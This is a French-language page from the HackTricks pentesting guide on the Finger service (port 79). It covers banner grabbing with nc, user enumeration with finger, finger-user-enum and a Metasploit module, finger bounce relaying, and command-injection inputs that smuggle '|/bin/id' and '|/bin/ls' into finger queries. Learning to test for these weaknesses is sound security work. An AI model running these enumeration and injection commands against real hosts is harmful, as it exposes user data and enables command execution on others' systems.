hacktricks/network-services-pentesting/pentesting-finger.md

4 KiB

79 - Pentesting Finger

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :

Informations de base

Finger est un programme que vous pouvez utiliser pour trouver des informations sur les utilisateurs d'ordinateurs. Il liste généralement le nom de connexion, le nom complet, et éventuellement d'autres détails sur l'utilisateur que vous interrogez. Ces détails peuvent inclure l'emplacement du bureau et le numéro de téléphone (si connus), l'heure de connexion, le temps d'inactivité, l'heure à laquelle le courrier a été lu pour la dernière fois, et les fichiers de plan et de projet de l'utilisateur.

Port par défaut : 79

PORT   STATE SERVICE
79/tcp open  finger

Énumération

Récupération de bannière/Connexion de base

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Énumération des utilisateurs

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Vous pouvez également utiliser finger-user-enum de pentestmonkey, voici quelques exemples :

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap exécute un script en utilisant les scripts par défaut

Metasploit utilise plus d'astuces que Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Exécution de commande

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Rebond Finger

Utiliser un système comme relais finger

finger user@host@victim
finger @internal@external
Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :